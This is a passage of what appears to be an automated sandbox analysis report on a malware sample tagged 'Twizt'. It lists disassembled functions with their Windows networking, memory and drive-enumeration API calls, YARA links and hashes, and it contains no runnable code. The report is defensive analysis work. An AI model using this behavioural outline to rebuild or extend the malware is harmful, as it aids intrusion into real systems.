                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                                      • String ID: Twizt$Twizt
                                                                                                                                                                                                      • API String ID: 1659193697-16428492
                                                                                                                                                                                                      • Opcode ID: 1349ff72827666e4cbc29eb052c20b65a3979f5a02af5532c34680a7c0598164
                                                                                                                                                                                                      • Instruction ID: 424cb4e193b88585781965e36c58f6fe4c92dd312b0dedf0f064d4bdf42048bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1349ff72827666e4cbc29eb052c20b65a3979f5a02af5532c34680a7c0598164
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE113DB5900108BFDB04DFA8D941E9EB7B5EF48304F14C1A9FD19AB342D635EA10CBA6
                                                                                                                                                                                                      Function 0040D840 Relevance: 4.5, APIs: 3, Instructions: 45networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040D853
                                                                                                                                                                                                      • htons.WS2_32(00009E34), ref: 0040D885
                                                                                                                                                                                                      • connect.WS2_32(000000FF,?,00000010), ref: 0040D89F
                                                                                                                                                                                                        • Part of subcall function 0040B4F0: shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
                                                                                                                                                                                                        • Part of subcall function 0040B4F0: closesocket.WS2_32(0040B4DD), ref: 0040B503
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: closesocketconnecthtonsshutdownsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1987800339-0
                                                                                                                                                                                                      • Opcode ID: 33603a608139399c0d84bb830c7b48966f7cdbf7a5e618daadc4b0f5ccc7d938
                                                                                                                                                                                                      • Instruction ID: fe5c709ea45c5a11aa3c9160e55f3cfd3489188b927fc5d3b71a7e9497cbc338
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33603a608139399c0d84bb830c7b48966f7cdbf7a5e618daadc4b0f5ccc7d938
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91113C74D05209EBCB10DFE4D9096AEB770AF08320F2082A9E525A73D0D7744F05975A
                                                                                                                                                                                                      Function 0040A820 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
                                                                                                                                                                                                      • HeapSetInformation.KERNEL32(02E70000,00000000,00000002,00000004), ref: 0040A876
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040A87C
                                                                                                                                                                                                        • Part of subcall function 0040A890: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3179415709-0
                                                                                                                                                                                                      • Opcode ID: aa0c888e319f0ad9fd531053ca841c15f09ebe8eab889de8fcd1a964cf2e908b
                                                                                                                                                                                                      • Instruction ID: 85029bc915bf12f33225f801dda82e4fa7d324228b613a3c41ba46cae7947946
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa0c888e319f0ad9fd531053ca841c15f09ebe8eab889de8fcd1a964cf2e908b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78F06DB1940305BBD324AB61BC05FA63B65B704305F08C17EEA00DA2D1EB79D810C69E
                                                                                                                                                                                                      Function 0040A760 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(02E70000,?,-0000000C), ref: 0040A7AA
                                                                                                                                                                                                      • memset.NTDLL ref: 0040A7E4
                                                                                                                                                                                                        • Part of subcall function 0040A820: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
                                                                                                                                                                                                        • Part of subcall function 0040A820: HeapSetInformation.KERNEL32(02E70000,00000000,00000002,00000004), ref: 0040A876
                                                                                                                                                                                                        • Part of subcall function 0040A820: GetCurrentProcessId.KERNEL32 ref: 0040A87C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3494217179-0
                                                                                                                                                                                                      • Opcode ID: fa29d78d3ce41ca275254412ae4d96764d92337fc642c65f72d4f93bbf2f11ac
                                                                                                                                                                                                      • Instruction ID: 5fdcc54cffe3c60a089a3a898bb23ed8061fd132f88873fc9f8ce54bcf899a2e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa29d78d3ce41ca275254412ae4d96764d92337fc642c65f72d4f93bbf2f11ac
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A71112B5D00208BBCB14EFA5DC45F9E7BB9AF44309F04C169F508AB381D638DA64CB99
                                                                                                                                                                                                      Function 0040DFD0 Relevance: 3.0, APIs: 2, Instructions: 49synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                                                                                        • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                        • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                        • Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                                                                                        • Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DFFD
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000006BC,00001388), ref: 0040E047
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3920643007-0
                                                                                                                                                                                                      • Opcode ID: 18c62cc6d519b2e8afdf3871f58b5d287ebe97866f2e1beb6f2c6a56a98bb43e
                                                                                                                                                                                                      • Instruction ID: 346b0ed27967947cee21f80887d76a0c9fc99ab28eac90287f9a1883fefaa601
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18c62cc6d519b2e8afdf3871f58b5d287ebe97866f2e1beb6f2c6a56a98bb43e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C411A1B5E00208ABE704EBE5DC46FAF7735AB04704F14857AF501772D1E6B9AE50CB98
                                                                                                                                                                                                      Function 0040B780 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: gethostbynamegethostname
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3961807697-0
                                                                                                                                                                                                      • Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                                                                                                      • Instruction ID: d19b970f4f05460fb5f23fa9ea20f915887bff4352c67af57008564f6b42df24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64112E349042188BCB25DB14C844BD8B779EB65314F14C6DAD48967390C7F96DC5CF89
                                                                                                                                                                                                      Function 0040B3F0 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: gethostbynameinet_addr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1594361348-0
                                                                                                                                                                                                      • Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                                                                                                      • Instruction ID: cf68f0f803e5ad204852fc960aab75f2335c53b4724a48f6e286a6dac7d73619
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F0AC78900208EFCB14DFA4E54899DBBB4EB49311F2083A9E905673A0D7749E80DB84
                                                                                                                                                                                                      Function 0040BDD0 Relevance: 3.0, APIs: 2, Instructions: 16synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000006BC,000003E8), ref: 0040BDDE
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(00414FB0), ref: 0040BDF0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DecrementInterlockedObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4086267124-0
                                                                                                                                                                                                      • Opcode ID: b3d5e5d618c3ee1c5ce6ac09c8534b3c9b924509322a4d5e56075276ed9f4435
                                                                                                                                                                                                      • Instruction ID: 5baab0edd941cf9a4a76b18d4dbc399760136ebc64c148788ac0b196bea4a2c6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3d5e5d618c3ee1c5ce6ac09c8534b3c9b924509322a4d5e56075276ed9f4435
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71D0A93124430867C6106BA2FC4AB9FBA5FEB10714F208433F201F52C0EBB888C196EE
                                                                                                                                                                                                      Function 0040B4F0 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
                                                                                                                                                                                                      • closesocket.WS2_32(0040B4DD), ref: 0040B503
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: closesocketshutdown
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 572888783-0
                                                                                                                                                                                                      • Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                                                                                                      • Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94
                                                                                                                                                                                                      Function 0040BBB0 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                      • Opcode ID: 7b213cd4d069c01e8a620414b83cfb343b0676d070a872b63673a2a7234e7122
                                                                                                                                                                                                      • Instruction ID: 13b3a4f761e8e0ec39884722658b832f986ab9836cdaa210380d175f348a5a39
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b213cd4d069c01e8a620414b83cfb343b0676d070a872b63673a2a7234e7122
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2E09AB0A41204EBCB00DF88FC09B983774E744304F1281B9E81453390EBB4EE80CA8D
                                                                                                                                                                                                      Function 0040B510 Relevance: 2.5, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B518
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B528
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                      • Opcode ID: ad8263c65cb201d3706fc4fef9bb1207c721a47fd2d799970df71f2cf60a6b1c
                                                                                                                                                                                                      • Instruction ID: 14b8899719e1d7f6bd9f87e5ca311e10c022d8288dc76d62f5c8fe7294ca2835
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad8263c65cb201d3706fc4fef9bb1207c721a47fd2d799970df71f2cf60a6b1c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDB09B701C1329B7810037D5BC0B7C43E29D544B1539380F6B51954195AEE555C0555D
                                                                                                                                                                                                      Function 0040D710 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,?,00000000), ref: 0040D72F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: send
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                                                      • Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                                                                                                      • Instruction ID: e7aa79f816f91947af6fbc74e9c8fbfd3bb2dea631739c5f8479ec5b7c0f5cfd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58013C3890438DEFCB00DFA8C888BDE7BB4BB08314F1085A9EC55A7380D3B59699CB55
                                                                                                                                                                                                      Function 0040D930 Relevance: 1.5, APIs: 1, Instructions: 25synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                                                                                        • Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000006BC,00001388), ref: 0040D95C
                                                                                                                                                                                                        • Part of subcall function 0040D550: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3309573332-0
                                                                                                                                                                                                      • Opcode ID: dea414f55044976029bfea1705a47b8f4b0a5085fa57cca7b4be92acb39eaa1a
                                                                                                                                                                                                      • Instruction ID: 2ee0a3073efd4fba8235a9b1d7a198457ec1c10d5c824cc9a6b08d4439e9405f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dea414f55044976029bfea1705a47b8f4b0a5085fa57cca7b4be92acb39eaa1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E092B1D40308A7C714E7E5A806BAF762A9710305F54407AF600762C1DA799A44D7DC
                                                                                                                                                                                                      Function 00407670 Relevance: 1.5, APIs: 1, Instructions: 23comCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 542301482-0
                                                                                                                                                                                                      • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                                                                                                      • Instruction ID: d29105fc803771725095f39a6bc68a1d0ed1c954ca33f5653c88c8c6fc3524cf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07E0ED74D1020CFFDF00DF94C889BDEBBB8AB44315F1081A9E90567280D7B96A94CB95
                                                                                                                                                                                                      Function 00406300 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00406360: GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DriveTypelstrcpy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3664088370-0
                                                                                                                                                                                                      • Opcode ID: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                                                                                                                                                      • Instruction ID: 07938d44ddb1935cabae668892a579954ff71e0ca3886b5fa6316a5d3981c012
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF01D75900248FBDB04DFA4D4557DEB7B4EF44304F04C5A9E81AAB280E679AB58CB89

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 004068E0 Relevance: 107.2, APIs: 47, Strings: 14, Instructions: 407fileCOMMON
